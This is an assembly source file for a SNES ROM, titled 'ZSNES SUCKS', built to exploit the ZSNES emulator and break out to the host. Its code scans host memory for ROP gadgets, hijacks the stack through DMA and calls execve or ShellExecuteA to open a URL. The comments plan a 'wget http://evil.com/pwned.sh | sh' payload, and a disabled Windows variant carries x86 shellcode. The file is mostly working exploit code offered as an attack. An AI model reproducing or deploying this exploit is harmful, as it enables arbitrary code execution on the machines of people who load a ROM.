;rm Z2.sfc; asar Z2.asm && gdb -batch -x gdb.txt

;!base = 0x00401000 ; windows
!base = 0x08048000 ; linux

;goals:
;disassemble
; done
;locate all usable partial instructions
; done
;locate a victory condition
; open "https://stekiri.files.wordpress.com/2009/09/linus-sucks-large.gif"
; then exit() or continue unharmed
;locate important tables
; IRAM - 08329314
; WRAM - 08362FE0
; reg fn ptr table - 088B37C0 + 0x2100*4
;locate import table
; system() - (pointer to 0xB75AE100)
;locate a strategy to open the browser
; leak %esp
;  08108FA4: 02 and [esi-0x9], esp; ret
;   guimouse.inc(gui.asm):106-107
;   in DMA, [esi-0x9] is $43x7-A, can easily be read or written from SNES side
;   in opcodes, [esi] is current PC, I think; also easily readable, but needs some jumping around to get it written where I want
;  also need to execute that - need to find 'regptra'
; inflate stack (once should be enough)
; one DMA inflation is ~32 bytes

;ZSNES register use while executing opcodes:
;eax - value to be written, scratch
;ebx - current opcode byte, scratch
;ecx - current address, scratch?
;edx.h - cycle counter?
;edx.l - something important; cpu flags?
; these four can be overwritten I think
;esi - next opcode to execute (pointer to ROM)
;edi - opcode dispatch table
;ebp - pointer to where the SPC is executing?
;esp - stack
; must be preserved

;the following registers are pushed during DMA handling:
; eax esi edi ecx edx
; ebx esp - also harmless to use, ebx is global scratch across zsnes and nobody ever violates esp
; however, ebp is danger
;register use during DMA handling:
; eax - free, initially 'snesmmap' or 'snesmap2'
; ebx - SCRATCH; set to garbage (ebx=0, bl=current bank) between each iteration
; ecx - UNSAFE; current 'snippet pc' (0x002160 and higher)
; edx - safe to use temporarily, but 4 is subtracted every fourth iteration, and if <= 4, the loop ends
; esi - free, initially random pointer
; edi - free, initially '.addrwrite' for the relevant PPU reg mode (two regs write twice, etc)
; ebp - UNSAFE; something SPC-related, must be preserved

;syscall ingredients:
; any int 0x80 'CD 80'
;  there are only four in the entire zsnes:
;  or      ch, 0FFFFFF80H                          ; 0806D873 _ 80. CD, 80
;   vcache.asm: or ch,80h
;   after returning, writes random trash to u64[edi]
;   byte[.rowleft] and byte[.count] must be 1 for it to return as fast as possible, and byte[.nextar] must be 0
;   safe to use if one syscall is not enough, but execve '/bin/sh -c "wget http://evil.com/pwned.sh | sh"' is enough for everything
;  or      ch, 0FFFFFF80H                          ; 0806DED9 _ 80. CD, 80
;   nearly same as above, but writes different things; this one seems more annoying
;  mov     ch, cl                                  ; 0822C0EC _ 88. CD
;  and     cl, 0AH                                 ; 0822C0EE _ 80. E1, 0A
;   video/newgfx.asm: mov ch,cl; and cl,0Ah
;   syscall may set %esi to garbage before going back on track
;   do not use, it writes and depends on regs all over
;  jmp     ?_59958                                 ; 08268C70 _ EB, CD
;  cmp     byte [?_80171], 1                       ; 08268C72 _ 80. 3D, 0847A700(d), 01
;   somewhere in newgfx2.asm or newg162.asm, 'mov byte[tleftn],33; .label: mov cx,[vrama+eax]; xor ecx,[ng16bprval]'
;   writes garbage to dword[%edi] and dword[%eax], and reads byte[%esp+%eax], before getting on track
;   do not use, it writes and depends on regs all over
; all four stable

; pop eax
; pop ebx
; pop ecx
; pop edx
;  these four are common as fuck - but there's also one that pops all four:
;   080BBB44: pop edx; pop ecx; pop ebx; pop eax; ret
;   dsp.asm:2228-2232
;   same sequence also exists in dspproc.asm
;eax = syscall nr, execve = 11
;ebx = filename "/usr/bin/xdg-open"
;ecx = argv { "/usr/bin/xdg-open", "http://piv.pivpiv.dk" }
;edx = envp NULL

;required locations to find:
; 'and [%esi-9],%esp' in guimouse.inc
; regptra
; IRAM
;  find it via regptra[0x3000*4]
; 080BBB44: pop edx; pop ecx; pop ebx; pop eax; ret [dsp.asm:2228-2232]
; the above int 0x80

;ram map (SA-1 direct page):
;$00 - and [esi-0x9], esp
;$04 - syscall
;$08 - pop all registers
;$0C - regptra minus 0x8000 - access via $2160*4 (+2)
;$10 - IRAM minus 0x3000 - access via $3000..$37FF

;required steps:
;- find the above five
;- grab %esp
;- fix pointers in the fake stack
;- inflate the stack
;- DMA $2180 to stack
;- when it returns, I win.


org $008000
Reset:
XCE
REP #$30

LDA #SA1Reset
STA $2203
STZ $2200

;the SNES CPU can't do hacking (or at least not at the same time as SA-1), might as well do what we can use it for
LDY #$3000
LDX.w #IRAM
LDA.w #IRAM_end-IRAM
MVN $00,$00

LDY #$4300
LDX.w #DMA
LDA.w #DMA_end-DMA
MVN $00,$00

LDA.w #IRAM_dmadata-$3000
STA $2181

;TODO: upload a counter for how much of it is done to VRAM
;just slam loads to $3002/6/A/E/12, it's safe
;read the high words so we don't risk anything stupid if one of them by accident ends up at 0x08270000

BRA $FE


SA1Reset:
REP #$30
LDA #$0780
TCD
;0805 - BWRAM pointer
PEA $4040
PLB
PLB


macro scan_reset()
;$85.d + X = start
LDA.w #!base>>16
STA $87
LDX.w #!base
STZ $85
endmacro


macro scan_aligned(off1, val1, off2, val2, off3, val3, off4, val4)
--
LDA.w $0000+<off1>,x
CMP.w #<val1>
BEQ +
-
TXA
CLC
ADC #$0010
TAX
BCC --
INC $87
BRA --

+
LDA.w $0000+<off2>,x
CMP.w #<val2>
BNE -
LDA.w $0000+<off3>,x
CMP.w #<val3>
BNE -
LDA.w $0000+<off4>,x
CMP.w #<val4>
BNE -
endmacro


macro scan_unaligned1(off1, val1)
LDX #$0000
-
INX
LDA.w <off1>,x
CMP.w #<val1>
BNE -
endmacro

macro scan_unaligned(off1, val1, off2, val2)
LDX #$0000
-
INX
LDA.w <off1>,x
CMP.w #<val1>
BNE -
LDA.w <off2>,x
CMP.w #<val2>
BNE -
endmacro


macro scan_85_add_x_const(skip)
TXA
CLC
ADC.w #<skip>
STA $85
BCC +
INC $87
+
endmacro

macro scan_85_add_x_85()
TXA
CLC
ADC $85
STA $85
BCC +
INC $87
+
endmacro

;scan_reset:
;sets $87 to !base.hw
;sets $85 to 0
;sets X to !base.lw

;scan_aligned:
;in: $85.d+x
;out: $85.d+x = location, $85 = #$0000, only tries every 16th location

;scan_unaligned:
;in: $85.d = start
;out: $85.d+x = location

;scan_store_x_add:
;in: $85 = 0
;out: $85.d += x+(param)

;scan_85_add_x_85:
;in: $85 nonzero
;out: $85.d += x


%scan_reset()
;gui/guitools.inc:24 CopyString
;mov dl, [eax]; mov [ebx], dl; inc eax; inc ebx; or dl,dl
%scan_aligned(0, 0x8A50, 2, 0x8810, 4, 0x4013, 6, 0x0843)
;now at 0x08107B50
%scan_85_add_x_const($1400)
;now at 0x08108F50
;distance to target: T minus 0x0054
;target:
;        jz      ?_21354                                 ; 08108FA3 _ 74, 21
;        test    bx, 1H                                  ; 08108FA5 _ 66: F7. C3, 0001
%scan_unaligned(0, 0x6621, 2, 0xC3F7)
%scan_85_add_x_85()

LDA $85
STA $00
LDA $87
STA $02


%scan_reset()
;vcache.asm:122 UpdateVolume
;?_03180:pushad                                          ; 08067AF0 _ 60
;        xor     eax, eax                                ; 08067AF1 _ 31. C0
;        mov     al, byte [?_71976]                      ; 08067AF3 _ A0, 0832260C(d)
;        shl     eax, 7                                  ; 08067AF8 _ C1. E0, 07
;        mov     ebx, 2748779069                         ; 08067AFB _ BB, A3D70A3D
;
;        or      ch, 0FFFFFF80H                          ; 0806D873 _ 80. CD, 80
%scan_aligned(0, 0x3160, 2, 0xA0C0, 12, 0x0A3D, 14, 0xA3D7)
%scan_85_add_x_const($5D60) ; actually $5D83
%scan_unaligned1(0, 0x80CD)
%scan_85_add_x_85()

LDA $85
STA $04
LDA $87
STA $06


%scan_reset()
;dspproc.asm:405 conv2speed
;?_12142:mov     eax, dword [edi]                        ; 080BC780 _ 8B. 07
;        mov     ebx, dword [?_72806]                    ; 080BC782 _ 8B. 1D, 08342B38(d)
;        mul     ebx                                     ; 080BC788 _ F7. E3
;        mov     ebx, 11025                              ; 080BC78A _ BB, 00002B11
;        div     ebx                                     ; 080BC78F _ F7. F3
%scan_aligned(0, 0x078B, 2, 0x1D8B, 8, 0xE3F7, 11, 0x2B11)
%scan_85_add_x_const($2240) ; actually $226C
;        pop     edx                                     ; 080BE9EC _ 5A
;        pop     ecx                                     ; 080BE9ED _ 59
;        pop     ebx                                     ; 080BE9EE _ 5B
;        pop     eax                                     ; 080BE9EF _ 58
;        ret                                             ; 080BE9F0 _ C3
%scan_unaligned(0, 0x595A, 2, 0x585B)
%scan_85_add_x_85()

LDA $85
STA $08
LDA $87
STA $0A


%scan_reset()
;memory.asm:40 regaccessbankr8
;?_13289:test    ecx, 8000H                              ; 080CB5A0 _ F7. C1, 00008000
;        jz      ?_13290                                 ; 080CB5A6 _ 74, 0D
;        mov     ebx, dword [?_75472+ebx*4]              ; 080CB5A8 _ 8B. 1C 9D, 083913F0(d)
;        mov     al, byte [ebx+ecx]                      ; 080CB5AF _ 8A. 04 0B
;        xor     ebx, ebx                                ; 080CB5B2 _ 31. DB
;        ret                                             ; 080CB5B4 _ C3
%scan_aligned(0, 0xC1F7, 6, 0x0D74, 9, 0x9D1C, 16, 0x0B04)
STX $85

;        call    near [?_80508+ecx*4]                    ; 080CB5CC _ FF. 14 8D, 088B37C0(d)
LDA $002F ; use X to save a few cycles here
LDX $0031
STA $0C
STX $0E
STA $85
STX $87

LDA $00
STA $2160*4
LDA $02
STA $2160*4+2 ; set $2160.r to stack hack

LDA $3000*4
LDX $3000*4+2
STA $85
STX $87

LDX $0002
LDY $0004
STX $10
STY $12
STX $85
STY $87

esp:
dd -1 ; let's execute it, it's SBC $FFFFFF,x which presumably points nowhere.
NOP ; 'esp' must be exactly 9 bytes before the end of the following LDA, so I can't use this byte

LDA $002160


;IRAM minus 0x3000 is currently in $85, might as well use it
;same value is also in Y(high):X(low)

LDA $04
STA.w IRAM_dmadata_int8
LDA $06
STA.w IRAM_dmadata_int8+2
LDA $08
STA.w IRAM_dmadata_popa
LDA $0A
STA.w IRAM_dmadata_popa+2


TXA
CLC
ADC.w #IRAM_URL
STA.w IRAM_argv+4
TYA
ADC #$0000
STA.w IRAM_argv+6

TXA
CLC
ADC.w #IRAM_xdgopen
STA.w IRAM_argv+0
STA.w IRAM_dmadata_xdgo+0
TYA
ADC #$0000
STA.w IRAM_argv+2
STA.w IRAM_dmadata_xdgo+2

TXA
CLC
ADC.w #IRAM_argv
STA.w IRAM_dmadata_argv+0
TYA
ADC #$0000
STA.w IRAM_dmadata_argv+2
;IRAM_argv: dd 0,0,0 ; .xdgopen, .URL, NULL
;IRAM_xdgopen: db "/usr/bin/xdg-open",0
;IRAM_URL: db "http://piv.pivpiv.dk/",0
;IRAM_dmadata_argv: dd -1 ; %ecx - argv (.argv)
;IRAM_dmadata_xdgo: dd -1 ; %ebx - filename (.xdgopen)


LDA.l esp
STA $85
LDA.l esp+2
STA $87



;we have one more thing to do: we need to find envp
;facts:
;- there are three consecutive dwords on the stack, the arguments to main()
;- the first (argc) is low, <256, but nonzero
;- the second (argv) is between esp and esp+512
;- the third (envp) is equal to first*4 + second + 4

LDX #$0000

FindStack:

.wrong:
INX #4

LDA $0004,x
SEC
SBC.l esp
TAY
LDA $0006,x
SBC $000A,x
BNE .wrong

CPY #$0200
BCS .wrong

LDA $0002,x
BNE .wrong
LDA $0000,x
DEC A
CMP #$0100
BCS .wrong
INC #2
ASL #2
ADC $0004,x
STA $20
LDA $0006,x
ADC #$0000
CMP $000A,x
BNE .wrong
LDA $0008,x
CMP $20
BNE .wrong


LDA $0008,x
STA.l IRAM_dmadata_envp
LDA $000A,x
STA.l IRAM_dmadata_envp+2



LDA #$0001
STA $00420B

BRA $FE ; if not zsnes, we got an infinite loop above, but let's do this anyways.


;ram map, SA-1 DP:                                    [ubuntu   - gentoo  ]
;$00 - and [esi-0x9], esp                             [08108FA4 - 080E99E4]
;$04 - syscall                                        [0806D874 - 
;$08 - pop all registers                              [080BE9EC - 
;$0C - regptra minus 0x8000 - access via $2160*4 (+2) [088B37C0 - 
;$10 - IRAM minus 0x3000 - access via $3000..$37FF    [08326314 - 
;.l esp - %esp                                        [FFFFD178 - 



;useful pointers [gentoo]:
;transdma: 0x080B6490 (end: 0x080B66B4, end reverse 0x080B68A1)
;dmadata:  0x08353E27
;%esp:     0xFFFFD17C (strangely constant)





IRAM:
base $3000
.argv: dd 0,0,0 ; .xdgopen, .URL, NULL
.xdgopen: db "/usr/bin/xdg-open",0
.URL: db "https://stekiri.files.wordpress.com/2009/09/linus-sucks-large.gif",0

.dmadata:

;db $02 ; DMA stack inflation

..popa: dd -1 ; pop all registers
..envp: dd -1 ; %edx - envp (NULL)
..argv: dd -1 ; %ecx - argv (.argv)
..xdgo: dd -1 ; %ebx - filename (.xdgopen)
dd 11 ; %eax - syscall number
..int8: dd -1 ; int 0x80

base off

.end

DMA:
;  dir      reg       source      bytes   hdmabnk hdmacpos hlc      unused
;db $80 : db $80 : dl $00420B : dw $0001 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> DMA regs (inflation)

;db $80 : db $80 : dl $401000 : dw $0018 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> location
db $80 : db $80 : dl $400000 : dw $0018 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> location
;db $80 : db $80 : dl $400000 : dw $0040 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> location

;db $80 : db $80 : dl $123456 : dw $0008 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> location
;db $00 : db $3F : dl $002160 : dw $0008 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; $2160+ -> $213F
.end

print "PC = ",pc


org $00FFC0
db "ZSNES SUCKS          ";name
db $23;lorom, SA-1
db $35;contains SA-1
db $05;1 bank
db $00;no sram
db $00;ntsc
db $00;licencee
db $00;version
dw $0000,$FFFF;checksum + complement
db $00,$00,$00,$00;unknown stuff
dw $5555,$5555,$FFFF;cop, brk, abort(?)
dw $5555,$FFFF,$5555;nmi, unused, irq
db $00,$00,$00,$00;unknown
dw $FFFF,$FFFF,$FFFF;(emulation) cop, unused, abort
dw $FFFF,Reset,$FFFF;(emulation) nmi, reset, irq/brk

















;we need to:
;store IRAM (our URL) to TempVarSeek
;store Get_Time+12 to register $2160
;store LaunchURL to register $2161
;DMA two bytes from $2160(+) to $213F(.)

;so we need to find
;Get_Time (0x08088B6C)
;TempVarSeek (0x08325A74)
;IRAM (0x08329314)
;regptr (0x088B37C0, +0x2160*4)
;LaunchURL (0x08303D00 - unreferenced! hopefully -ffunction-section -fgc-sections is not present)
;three of which are refered to in sa1regs.asm, and another of which is refered to from one of the three
;let's go there

;start of sa1regs is src/chips/sa1regs.asm:60 RTC2800: (080B03D0)
;?_10441:push    ebx                                     ; 080B03D0 _ 53
;        cmp     dword [?_72347], 100                    ; 080B03D1 _ 83. 3D, 0832905C(d), 64
;        cmp     dword [?_72345], 0                      ; 080B03D8 _ 83. 3D, 08329054(d), 00
;        jne     ?_10444                                 ; 080B03DF _ 0F 85, 000000DD
;        cmp     byte [?_74633], 1                       ; 080B03E5 _ 80. 3D, 08360EC1(d), 01
;        je      ?_10444                                 ; 080B03EC _ 0F 84, 000000D0
;        push    ebx                                     ; 080B03F2 _ 53
;        push    eax                                     ; 080B03F3 _ 50
;        call    ?_06501                                 ; 080B03F4 _ E8, FFFD8767
;        mov     bl, al                                  ; 080B03F9 _ 88. C3
;        and     bl, 0FH                                 ; 080B03FB _ 80. E3, 0F
;which means we have to look for anything 16-aligned where
;00 = 8353
;07 = 8364
;0F = 850F
;1C = 840F






;.loop
;
;LDA #$6621
;CMP $400000,x
;BEQ .match0 ; BEQ to later code to save a cycle (okay, I'm not sure if zsnes emulates that, probably doesn't)
;CMP $400001,x
;BEQ .match1 ; unroll for the same reason
;CMP $400002,x
;BEQ .match2
;CMP $400003,x
;BEQ .match3
;.nomatch_ret
;TXA
;CLC        ; there's a bunch of alignment to multiples of 32 bytes in zsnes
;ADC #$0004 ; but .text itself is only aligned to 16 bytes, so that's what applies
;TAX        ; (multiple .text chunks in the same object file are appended directly after each other, unless explicitly aligned)
;BCC .loop
;INC $87
;BRA .loop
;
;.nomatch
;TXA
;AND #$FFFC
;TAX
;STZ $85
;BRA .nomatch_ret
;
;.match3
;INX
;.match2
;INX
;.match1
;INX
;.match0
;LDA $400002,x
;CMP #$C3F7
;BNE .nomatch
;LDA $400004,x
;CMP #$0001
;BNE .nomatch
;LDA $400006,x
;CMP #$1A75
;BNE .nomatch
;
;STX $85
;
;;STZ $87
;;STZ $85
;STA $400000
;
;;found RTC2800, $400000 points there
;
;;goals:
;;store IRAM (our URL) to TempVarSeek
;;store Get_Time+12 to register $2160
;;store LaunchURL to register $2161
;;DMA two bytes from $2160(+) to $213F(.)
;
;macro copy32(target, source)
;LDA.l <source>
;STA <target>
;LDA.l <source>+2
;STA <target>+2
;endmacro
;macro copyadd32(target, source1, source2)
;CLC
;LDA.l <source1>
;ADC <source2>
;STA <target>
;LDA.l <source1>+2
;ADC <source2>+2
;STA <target>+2
;endmacro
;macro copyaddc32(target, source, const)
;CLC
;LDA.l <source>
;ADC #<const>
;STA <target>
;LDA.l <source>+2
;BCC +
;INC A
;+
;STA <target>+2
;endmacro
;macro readraw(target, source)
;%copy32(<target>, $400000+<source>-!base)
;endmacro
;macro readraw_add(target, pcsource, snssource)
;%copyadd32(<target>, $400000+<pcsource>-!base, <snssource>)
;endmacro
;macro readraw_addconst(target, source, const)
;%copyaddc32(<target>, $400000+<source>-!base, <const>)
;endmacro
;
;;ram map (in direct page - just because I'm using it for hacks doesn't mean I can't also use it for ram):
;;00.d - IRAM
;;04.d - TempVarSeek
;;08.d - Get_Time
;;0C.d - LaunchURL
;;10.d - regptr (NOTE: it's a pointer to the real one)
;;14.d - regptra
;
;!base = 0x080B03D0 ; this matches Ubuntu 14.04 zsnes
;%readraw($00, 0x080B0FE5+2) ; IRAM from sa1dmairam
;%readraw_add($08, 0x080B03F4+1, $85) ; Get_Time from RTC2800
;LDA $08
;CLC
;ADC.w #$29+12 ; 0x29 for difference between RTC2800: and call Get_Time
;STA $08       ; 12 for difference between Get_Time and mov eax, [TempVarSeek]
;BCC +
;INC $0A
;+
;%readraw($10, 0x080B054A+2) ; regptr from RTCReset
;
;LDA $08
;STA $85
;LDA $0A
;STA $87
;LDA $400001
;STA $04
;LDA $400003
;STA $06
;
;;pointers [gentoo]:
;;RTC2800: - 080B03D0 [08092B40]
;
;;IRAM - 08329314 [83042F4]
;;TempVarSeek - 08325A74 [8300A50]
;;Get_Time - 08088B60 [806FE3C]
;;LaunchURL - 0804CC1F []
;;regptr - 083256BC [8300698]
;;regptra - 088B37C0 [], +0x2160*4
;
;
;;at this point, we have a minor issue - LaunchURL exists, but its parameter is on the stack
;;it is also likely unreferenced, so we can't find something that pushes a register and calls it
;
;;we have several options:
;;either we can manipulate the existing top of the stack
;; which points to the DMA register settings
;;  we can't write the last four bytes, but that's not an issue - we can find the pointer and scribble there via BWRAM
;;  what is, however, an issue is that word[esi+5] is zeroed before we get a chance to do anything
;;recurse into the DMA registers and use a 'add esp, 0x10; ret' or similar
;; we can use DMA channel 0 to recurse and stick dmadata0 into the stack
;;  then channel 6 to write into dmadata0
;;  then 7 to execute something evil
;; unfortunately, the 'add esp, 0x10; ret' is unlikely to return to where we want it
;; additionally, 'add esp,***' is found only as part of C code
;;fiddle with %esp
;; tasty opcodes (some read %esp, some write):
;;  08108FA4: 02 and [esi-0x9], esp; ret
;;   stable, guimouse.inc(gui.asm):106-107
;;   [esi-0x9] is in the DMA registers, we can store 0xFFFFFFFF there from SNES
;;  08197FDF: 02 sub [edx+ecx], esp; ret
;;   part of a branch - may be useful?
;;  0807B4D8: 02 xchg esp, eax; ret
;;   instant victory - unfortunately, part of C code
;;  081036EB: 02 xchg [eax+0xe000000], esp; ret
;;   unstable
;;  080D2F5B: 03 add [eax], esp; add eax, 0x8353c04; ret
;;   unstable
;;  081F87C6: 03 pop esp; add al, 0x0; ret
;;   stable? part of macros in video/newgfx16.mac or newg16wn.mac (can't identify which)
;;    uses a really huge branch, but video/newgfx16.o is huge
;;    small differences (-24 +255) are acceptable, though may shred ebp, esi or edi
;;  0812CBBE: 03 pop esp; xor eax, 0x5c75f08; ret
;;   unstable
;;  082FE9CE: 03 xchg esp, eax; add al, 0x0; ret
;;  082FEA2F: 03 xchg esp, eax; add al, 0x0; ret
;;   two instances of 'sub esi,75036*4; ret' in video/copyvwin.asm
;;   both fully stable and usable
;;  08206074: 03 xchg esp, eax; add dword [ebx], 0x0; ret
;;  0806B04C: 03 xchg esp, eax; sub cx, 0x8; ret
;;  0806B0D9: 03 xchg esp, eax; sub cx, 0x8; ret
;;   not gonna check these three, the above two are so good I don't need anything else
;; if we choose one that reads %esp:
;;  inflate the stack? probably not needed, we want to segfault
;;  use a DMA from 2180{IRAM+0?} to a fake BWRAM to write the lower stack
;;  return to fancy location
;;find a push of a controlled value, then a call to another controlled value
;; the only choice I can find:
;;  zsnes_1_51/src/cpu/execute.asm:    push edx
;;  zsnes_1_51/src/cpu/execute.asm:    call dword near [memtablew8+ebx*4]
;; this means we have to control %edx (we will also guarantee segfault)
;; for example via:
;;  zsnes_1_51/src/cpu/execute.asm:    mov edx,[tempedx]
;;  zsnes_1_51/src/cpu/execute.asm:
;;  zsnes_1_51/src/cpu/execute.asm:.notokay
;;  zsnes_1_51/src/cpu/execute.asm:    ret
;; we also need to predict %ebx, but that's easy; it's the same as $43x4 (top three bytes zero)
;;  we can probably only use 00-3F or 80-BF, but for our purposes, anything except 00 works (00 risks interfering with our opcodes).
;;   01, for example
;
;
;;to win by controlling the stack, we need:
;;- find 'execve' or 'LaunchURL', IRAM, and guimouse.inc
;;- set $2160 to 'and [esi-0x9], esp'; DMA a single byte there (%esi is dmadata, which can easily be written)
;;- inflate the stack by DMAing the DMA control reg
;;- DMA to BWRAM, which now points to the stack instead
;;- most other stuff can be done from "SNES" side
;;fake stack:
;; fn "LaunchBrowser"
;; fn "zexit"
;; ptr "http://example.com/"
;;to survive:
;;- pop %ecx
;;- .dd placeholder(1)
;;- mov [%ecx],%eax
;;- .fn "LaunchBrowser"
;;- pop %eax (or some other register, doesn't matter which)
;;- .dd "http://example.com/"
;;- pop %eax
;;- .placeholder 1
;;- xchg %esp,%eax
;
;
;STZ $85
;STZ $87
;STA $400000
;
;
;
;
;LDA #$3F00 ; CPU(increment)->PPU(1reg), to register $213F (it's a read register, writing does nothing)
;STA $4370
;STZ $4373
;LDA #$2160 ; CPU address, $002160
;STA $4372
;STZ $4375 ; 65536 bytes (wraps around and scribbles across all kinds of registers - doesn't really matter)
;LDY #$80
;STY $420B ; using DMA channel 7 so I can stick trash in %eax and not worry
;
;BRA $FE
;
;;LDA $400000 ; segfault
;
;;LDX.w #Regs_end-Regs-2
;;.Loop
;;LDA.l Regs,x
;;STA.b $400000,x
;;DEX
;;DEX
;;BPL .Loop
;
;
;
;;        mov     eax, dword [?_72242]                    ; 08088B6C _ A1, 08325A74(d)
;
;;Regs:
;;dd 0x08301470 ; mov eax, 0x10      [eax=0x00000010]
;;dd 0x08083484 ; add eax, 0x832930c [eax=0x0832931C = IRAM+8]
;;dd 0x0807B4D8 ; xchg esp, eax      [esp=IRAM+8]
;;.end












;;;if 0
;;;;TODO:
;;;;32KB /dev/urandom
;;;;write this decryptor straight over that
;;;;for x=0x1FFE;x>=0;x-=2:
;;;;ADC $8000,x
;;;;EOR $A000,x
;;;;SBC $C000,x
;;;;SBC $E001,x
;;;;the last
;;;
;;;;0071A6C4 - start of WRAM [where is IRAM?]
;;;;00C62C68 - pointer to romdata
;;;;xxxxxxxx - pointer to wramdata
;;;
;;;!Random = $F9D0
;;;!Encrypted = $FBEA
;;;
;;;;random numbers:
;;;;$21D0 (used)
;;;;$3220 (used)
;;;;$BAC0 (used)
;;;;$D9D1 (used)
;;;;$7AEA (used)
;;;;$B2B2 (used)
;;;;$C299 (used)
;;;;$603D (used)
;;;;$04B1 (used)
;;;
;;;org $008000
;;;incbin random.bin ; fill unused space with crap
;;;
;;;org $008000
;;;tiles:   incbin img/tiles.bin ; $8000
;;;tilemap: incbin img/tilemap.bin ; $F000
;;;palette: incbin img/palette.bin  ; $F700
;;;upload: ; $F720 or something (slightly less)
;;;
;;;Reset:
;;;;STP
;;;SEI
;;;CLC
;;;XCE
;;;REP #$FF
;;;LDX #$1FF0;Some initializing
;;;TXS
;;;PHK
;;;PLB
;;;
;;;LDA #SA1Reset
;;;STA $2203
;;;STZ $2200
;;;
;;;SEP #$30
;;;LDA #$80
;;;STA $2100
;;;STZ $4200
;;;STZ $420B
;;;STZ $420C
;;;
;;;LDA #$01
;;;STA $2105
;;;STZ $2106
;;;LDA #$70
;;;STA $2107
;;;STZ $210B
;;;STZ $210D
;;;STZ $210D
;;;LDA #$FF
;;;STA $210E
;;;LDA #$07
;;;STA $210E
;;;STZ $2123
;;;LDA #$01
;;;STA $212C
;;;STZ $212D
;;;LDA #$30
;;;STA $2130
;;;STZ $2131
;;;LDA #$E0
;;;STA $2132
;;;STZ $2133
;;;
;;;STZ $2121
;;;LDX #$00
;;;REP #$20
;;;LDA #$2200
;;;STA $4300
;;;LDA.w #palette
;;;STA $4302
;;;STX $4304;palette,
;;;LDA #$0020 ; palette is actually slightly smaller, but the remainder isn't used
;;;STA $4305
;;;LDY #$01
;;;STY $420B
;;;SEP #$20
;;;
;;;LDA.b #%10000000
;;;STA $2115
;;;REP #$20
;;;STZ $2116
;;;LDA #$1801
;;;STA $4300
;;;LDA.w #tiles;first half of the tile data,
;;;STA $4302
;;;STX $4304
;;;LDA #$7000
;;;STA $4305
;;;LDY #$01
;;;STY $420B
;;;
;;;LDY #%10000000
;;;STY $2115
;;;LDA.w #$7000
;;;STA $2116
;;;LDA.w #$1801
;;;STA $4300
;;;LDA.w #tilemap
;;;STA $4302
;;;STX $4304
;;;LDA #$0700
;;;STA $4305
;;;SEP #$20
;;;LDY #$01
;;;STY $420B
;;;
;;;LDA #$0F
;;;STA $2100
;;;
;;;-
;;;INC.b $00
;;;BRA -
;;;
;;;print "muncher upload: ",pc,"/00F800"
;;;
;;;warnpc $00F800
;;;
;;;
;;;
;;;
;;;
;;;org !Encrypted
;;;base $0000
;;;
;;;db "GO AWAY",0
;;;
;;;
;;;;dummy code; not executed, just looks tasty, as if I'm upgrading the SNES PPU (read-only reg.)
;;;LDA #$08
;;;STA $213E
;;;STA $213E
;;;LDA #$28
;;;STA $213E
;;;RTS
;;;
;;;skip 6
;;;
;;;
;;;ADC $7E0000 ; not used either - where does it start?
;;;HackBegin:
;;;print "jmp to ",pc
;;;EOR $7E0000
;;;;TAX ; X = 553C
;;;;SBC $7E0000 ; A = 0018
;;;TAX ; X = 55E0
;;;SBC $7E0000 ; A = FFE0
;;;
;;;; if changing these, keep carry in mind
;;;;EOR #$081F ; 0807; WRAM (IRAM) pointer high,low
;;;EOR #$F7E7 ; 0807; WRAM (IRAM) pointer high,low
;;;STA $CBA1,x
;;;ADC #$C3AB ; CBB2; high - data, low - unused random trash
;;;STA $CB9F,x
;;;SBC #$C6B1 ; 0500; high - next location; low - data (07CB 0800 0560 06FB)
;;;STA $CBA0,x
;;;SBC #$FEA0 ; 0660; full results: 05 - 00CBFB60
;;;STA $CBA0,x
;;;EOR #$029B ; 04FB; 04 is a red herring
;;;STA $CBA0,x
;;;BRA HackPart2
;;;
;;;
;;;skip 5
;;;
;;;
;;;EvilCode:
;;;db $C7,$05 : dd 0x00CBFB60,0x0045CDAE ; mov [0x00CBFB60],0x0045CDAE ; restore $2180 handler
;;;db $51                                ; push ecx
;;;db $6A, $05                           ; push 5 ; INT nShowCmd = SW_SHOW
;;;db $6A, $00                           ; push 0 ; LPCTSTR lpDirectory
;;;db $6A, $00                           ; push 0 ; LPCTSTR lpParameters
;;;db $68 : dd 0x0071A6C4+TheURL-$0000   ; push __ ; LPCTSTR lpFile
;;;db $6A, $00                           ; push 0 ; LPCTSTR lpOperation
;;;db $6A, $00                           ; push 0 ; HWND hwnd
;;;db $FF,$15 : dd 0x006C81E0            ; call [0x006C81E0] ; ShellExecuteA
;;;db $59                                ; pop ecx
;;;db $C3                                ; ret
;;;
;;;TheURL:
;;;db "http://wayback.archive.org/web/2011/byuu.org/bsnes/accuracy",0
;;;
;;;
;;;
;;;LDA #$FF00
;;;STA $43FFFF
;;;STA $00FFFF
;;;
;;;HackPart2:
;;;
;;;LDA.w #0x0071A6C4+EvilCode-$0000>>16
;;;STA $400002
;;;LDA.w #0x0071A6C4+EvilCode-$0000
;;;STA $400000
;;;-
;;;LDA $217F  ; this triggers it
;;;CMP #$04B1 ; continued execution just continues to read out of bounds
;;;BCS -      ; next value is probably 0000, let's stop
;;;STA $FFFFFF
;;;LDA #$20DB
;;;STA $7FFFFF ; this stores a STP to RAM and JSLs it
;;;JSL $7FFFFF
;;;JSL $7FFFFF
;;;JML $555555
;;;
;;;
;;;skip 7
;;;
;;;;dummy code: pretend to overflow the stack (seems completely safe to me, it just wraps)
;;;LDA #$FFFF
;;;TCS
;;;PLA
;;;PLA
;;;PLA
;;;PLA
;;;LDA #$BAC0
;;;PHA
;;;LDA #$D9D1
;;;PHA
;;;RTL
;;;
;;;
;;;
;;;print "encrypted: ",pc,"/0001FE"
;;;warnpc $01FE
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;warnpc $00FFC0-64
;;;org $00FFC0-64
;;;rep 15 : db 0
;;;db "Say hi to Nomily! She likes eating bad software.",0
;;;print pc," should be 00FFC0"
;;;org $00FFC0
;;;db "LOL ZSNES ",0xC2,"          ";name (0xC2 is katakana Tsu, the smily kana)
;;;db $23;lorom, SA-1
;;;db $35;contains SA-1
;;;db $05;1 bank
;;;db $00;no sram
;;;db $00;ntsc
;;;db $00;licencee
;;;db $00;version
